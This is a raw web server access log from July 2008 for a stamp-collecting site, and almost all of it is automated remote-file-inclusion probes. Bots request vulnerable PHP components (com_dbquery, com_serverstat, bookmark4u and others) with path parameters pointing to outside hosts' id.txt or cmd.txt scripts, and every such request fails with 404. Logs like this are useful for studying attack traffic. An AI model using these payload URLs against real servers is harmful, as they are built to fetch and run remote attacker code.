207.58.170.49 - - [06/Jul/2008:21:30:46 -0700] "GET /logs/access_080421.log/include/functions_common.php?gl_root_path=http://tiemeup.com.au/admin/tmu_sessions/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
74.6.8.118 - - [06/Jul/2008:21:34:00 -0700] "GET /logs/access_080519.log HTTP/1.0" 200 5693247 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
216.245.192.26 - - [06/Jul/2008:21:34:29 -0700] "GET /logs/access_080414.log/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.classvogue.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
216.245.192.26 - - [06/Jul/2008:21:34:29 -0700] "GET /components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.classvogue.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
216.245.192.26 - - [06/Jul/2008:21:34:29 -0700] "GET /logs/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.classvogue.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
74.6.8.118 - - [06/Jul/2008:21:36:01 -0700] "GET /logs/?S=A HTTP/1.0" 200 8358 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
195.56.55.6 - - [06/Jul/2008:21:37:01 -0700] "GET /logs/access.log/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.56.55.6 - - [06/Jul/2008:21:37:01 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.56.55.6 - - [06/Jul/2008:21:37:02 -0700] "GET /logs/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
74.6.8.118 - - [06/Jul/2008:21:38:30 -0700] "GET /logs/access_080707.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.mathstamps.com"
66.76.60.39 - - [06/Jul/2008:21:39:29 -0700] "GET /logs/access_080602.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
66.76.60.39 - - [06/Jul/2008:21:39:29 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
66.76.60.39 - - [06/Jul/2008:21:39:30 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
66.76.60.39 - - [06/Jul/2008:21:39:32 -0700] "GET /logs/access_080609.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
216.245.192.26 - - [06/Jul/2008:21:41:03 -0700] "GET /logs/access_080428.log/components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.classvogue.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.mathstamps.com"
195.56.55.6 - - [06/Jul/2008:21:43:11 -0700] "GET /logs/access_080526.log/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
77.249.65.213 - - [06/Jul/2008:21:45:17 -0700] "GET /logs/access_080609.log//components/com_performs/performs.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
80.82.215.11 - - [06/Jul/2008:21:47:01 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
194.244.187.12 - - [06/Jul/2008:21:47:40 -0700] "GET /logs/access_080602.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
194.244.187.12 - - [06/Jul/2008:21:47:41 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
194.244.187.12 - - [06/Jul/2008:21:47:41 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
81.29.195.59 - - [06/Jul/2008:21:48:42 -0700] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
81.29.195.59 - - [06/Jul/2008:21:48:43 -0700] "GET /errors.php?error=http://www.diakonissenkrankenhaus.de/includes/phpmailer/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ws/4.7 [de] (Windows 3.1; I) [crank]" "www.mathstamps.com"
194.244.187.12 - - [06/Jul/2008:21:48:50 -0700] "GET /logs/access_080609.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.20.120.10 - - [06/Jul/2008:21:48:58 -0700] "GET /logs/access_080609.log//init_basic.php?GALLERY_BASEDIR=http://www.csccog.org/mambots/system/.bash/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
194.244.187.12 - - [06/Jul/2008:21:51:44 -0700] "GET /logs/access_080526.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
80.82.215.11 - - [06/Jul/2008:21:52:38 -0700] "GET /logs/access_080602.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.82.215.11 - - [06/Jul/2008:21:52:38 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
80.82.215.11 - - [06/Jul/2008:21:52:39 -0700] "GET /logs/access_080609.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
203.146.170.160 - - [06/Jul/2008:21:52:56 -0700] "GET /logs/access_080609.log//components/com_performs/performs.php?mosConfig_absolute_path=http://almendes.com/informatica/clientes_informatica/distral/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
66.76.60.39 - - [06/Jul/2008:21:53:43 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
195.56.55.6 - - [06/Jul/2008:21:58:52 -0700] "GET /logs/access_080505.log//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.56.55.6 - - [06/Jul/2008:21:58:52 -0700] "GET //index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.56.55.6 - - [06/Jul/2008:21:58:53 -0700] "GET /logs//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
195.56.55.6 - - [06/Jul/2008:21:59:02 -0700] "GET /logs/access_080609.log//index.php/component/option,com_juser/components/com_juser/xajak_functions.php?mosConfig_absolute_path=http://gotvdata.com/main/images/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
66.76.60.39 - - [06/Jul/2008:22:00:18 -0700] "GET /logs/access_080602.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
66.76.60.39 - - [06/Jul/2008:22:00:18 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
66.76.60.39 - - [06/Jul/2008:22:00:18 -0700] "GET /logs/access_080609.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
207.210.89.58 - - [06/Jul/2008:22:03:35 -0700] "GET /logs/access.log//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.php?mosConfig_absolute_path=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.210.89.58 - - [06/Jul/2008:22:03:36 -0700] "GET //%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.php?mosConfig_absolute_path=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.210.89.58 - - [06/Jul/2008:22:03:36 -0700] "GET /logs//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.php?mosConfig_absolute_path=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
80.86.92.124 - - [06/Jul/2008:22:03:42 -0700] "GET /logs/access.log//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.php?mosConfig_absolute_path=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
80.86.92.124 - - [06/Jul/2008:22:03:42 -0700] "GET //%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.php?mosConfig_absolute_path=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
80.86.92.124 - - [06/Jul/2008:22:03:43 -0700] "GET /logs//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.php?mosConfig_absolute_path=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
202.181.105.117 - - [06/Jul/2008:22:05:30 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.wow-unbreakables.de/phpBB2//language/lang_english/email/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.mathstamps.com"
74.54.20.194 - - [06/Jul/2008:22:06:02 -0700] "GET /logs/access.log//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.php?mosConfig_absolute_path=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
74.54.20.194 - - [06/Jul/2008:22:06:07 -0700] "GET //%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.php?mosConfig_absolute_path=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
74.54.20.194 - - [06/Jul/2008:22:06:12 -0700] "GET /logs//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.php?mosConfig_absolute_path=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
217.67.237.142 - - [06/Jul/2008:22:06:14 -0700] "GET /logs/access.log//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.php?mosConfig_absolute_path=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
217.67.237.142 - - [06/Jul/2008:22:06:15 -0700] "GET //%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.php?mosConfig_absolute_path=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
217.67.237.142 - - [06/Jul/2008:22:06:15 -0700] "GET /logs//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.php?mosConfig_absolute_path=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.205.103.246 - - [06/Jul/2008:22:06:39 -0700] "GET /logs/access_080609.log//%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?option=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
67.205.103.246 - - [06/Jul/2008:22:06:39 -0700] "GET //%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?option=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
67.205.103.246 - - [06/Jul/2008:22:06:39 -0700] "GET /logs//%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?option=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
213.250.2.28 - - [06/Jul/2008:22:06:41 -0700] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.210.89.58 - - [06/Jul/2008:22:07:01 -0700] "GET /logs/access_080609.log//%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?option=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.210.89.58 - - [06/Jul/2008:22:07:01 -0700] "GET //%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?option=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
207.210.89.58 - - [06/Jul/2008:22:07:01 -0700] "GET /logs//%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?option=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
80.86.92.124 - - [06/Jul/2008:22:08:19 -0700] "GET /logs/access_080609.log//%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?option=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
80.86.92.124 - - [06/Jul/2008:22:08:19 -0700] "GET //%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?option=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
80.86.92.124 - - [06/Jul/2008:22:08:20 -0700] "GET /logs//%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?option=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
67.205.103.246 - - [06/Jul/2008:22:08:49 -0700] "GET /logs/access_080526.log//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.php?mosConfig_absolute_path=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
67.205.103.246 - - [06/Jul/2008:22:08:49 -0700] "GET //%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.php?mosConfig_absolute_path=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
67.205.103.246 - - [06/Jul/2008:22:08:49 -0700] "GET /logs//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.php?mosConfig_absolute_path=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
80.86.92.124 - - [06/Jul/2008:22:09:50 -0700] "GET /logs/access_080526.log//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.php?mosConfig_absolute_path=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
207.210.89.58 - - [06/Jul/2008:22:10:26 -0700] "GET /logs/access_080602.log//%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?option=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
67.205.103.246 - - [06/Jul/2008:22:10:29 -0700] "GET /logs/access_080602.log//%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?option=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.mathstamps.com"
80.86.92.124 - - [06/Jul/2008:22:11:20 -0700] "GET /logs/access_080602.log//%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?option=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.mathstamps.com"
213.250.2.28 - - [06/Jul/2008:22:11:57 -0700] "GET /logs/access.log/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
213.250.2.28 - - [06/Jul/2008:22:11:58 -0700] "GET /logs/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
64.128.80.11 - - [06/Jul/2008:22:13:12 -0700] "GET /logs/index.php?redir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.mathstamps.com"
64.128.80.11 - - [06/Jul/2008:22:13:12 -0700] "GET /index.php?redir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.mathstamps.com"
217.67.237.142 - - [06/Jul/2008:22:13:31 -0700] "GET /logs/access_080609.log//%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?option=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
217.67.237.142 - - [06/Jul/2008:22:13:31 -0700] "GET //%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?option=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
217.67.237.142 - - [06/Jul/2008:22:13:32 -0700] "GET /logs//%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?option=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
200.126.108.198 - - [06/Jul/2008:22:14:20 -0700] "GET /logs/access_080609.log//%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?option=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.126.108.198 - - [06/Jul/2008:22:14:21 -0700] "GET //%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?option=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.126.108.198 - - [06/Jul/2008:22:14:21 -0700] "GET /logs//%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?option=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.54.20.194 - - [06/Jul/2008:22:14:59 -0700] "GET /logs/access_080609.log//%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?option=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
74.54.20.194 - - [06/Jul/2008:22:15:04 -0700] "GET //%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?option=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
74.54.20.194 - - [06/Jul/2008:22:15:05 -0700] "GET /logs//%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?option=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
217.67.237.142 - - [06/Jul/2008:22:15:41 -0700] "GET /logs/access_080526.log//%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?option=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
213.250.2.28 - - [06/Jul/2008:22:16:02 -0700] "GET /logs/access_080526.log/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://jeffery.wewokawoods.org/components/wing.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
190.54.62.72 - - [06/Jul/2008:22:17:02 -0700] "GET /logs/access_080609.log//config/dbutil.bck.php?confdir=http://www.geocities.com/lase_keren/scan/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
190.54.62.72 - - [06/Jul/2008:22:17:03 -0700] "GET //config/dbutil.bck.php?confdir=http://www.geocities.com/lase_keren/scan/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
190.54.62.72 - - [06/Jul/2008:22:17:03 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://www.geocities.com/lase_keren/scan/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
74.54.20.194 - - [06/Jul/2008:22:18:43 -0700] "GET /logs/access_080602.log//%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?option=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
200.126.108.198 - - [06/Jul/2008:22:19:38 -0700] "GET /logs/access_080602.log//%5Ccomponents%5Ccom_dbquery%5Cclasses%5CDBQ%5Cadmin%5Ccommon.class.php?option=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
200.6.155.114 - - [06/Jul/2008:22:19:54 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
80.82.215.11 - - [06/Jul/2008:22:20:10 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.creativ-s.ru/tmp/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.mathstamps.com"
217.67.237.142 - - [06/Jul/2008:22:20:14 -0700] "GET /logs/access_080526.log//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.php?mosConfig_absolute_path=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.mathstamps.com"
190.54.62.72 - - [06/Jul/2008:22:20:23 -0700] "GET /logs/access_080519.log//config/dbutil.bck.php?confdir=http://www.geocities.com/lase_keren/scan/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.mathstamps.com"
64.128.80.11 - - [06/Jul/2008:22:24:05 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.mathstamps.com"
58.69.172.67 - - [06/Jul/2008:22:28:13 -0700] "GET /logs/access.log//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.php?mosConfig_absolute_path=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
58.69.172.67 - - [06/Jul/2008:22:28:14 -0700] "GET //%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.php?mosConfig_absolute_path=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
58.69.172.67 - - [06/Jul/2008:22:28:15 -0700] "GET /logs//%2Fadministrator%2Fcomponents%2Fcom_serverstat%2Finstall.serverstat.php?mosConfig_absolute_path=http://dianadigsdirt.com/blog/wp-content/uploads/df??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
200.6.155.114 - - [06/Jul/2008:22:30:46 -0700] "GET /logs/access_080602.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
200.6.155.114 - - [06/Jul/2008:22:30:49 -0700] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
200.6.155.114 - - [06/Jul/2008:22:30:54 -0700] "GET /logs/access_080609.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.creativ-s.ru/tmp/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.mathstamps.com"
200.20.120.10 - - [06/Jul/2008:22:34:43 -0700] "GET /logs/access_080519.log///errors.php?error=http://geocities.com/cilux@rocketmail.com/njajal.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
200.20.120.10 - - [06/Jul/2008:22:34:43 -0700] "GET /logs///errors.php?error=http://geocities.com/cilux@rocketmail.com/njajal.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
200.20.120.10 - - [06/Jul/2008:22:34:43 -0700] "GET ///errors.php?error=http://geocities.com/cilux@rocketmail.com/njajal.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.mathstamps.com"
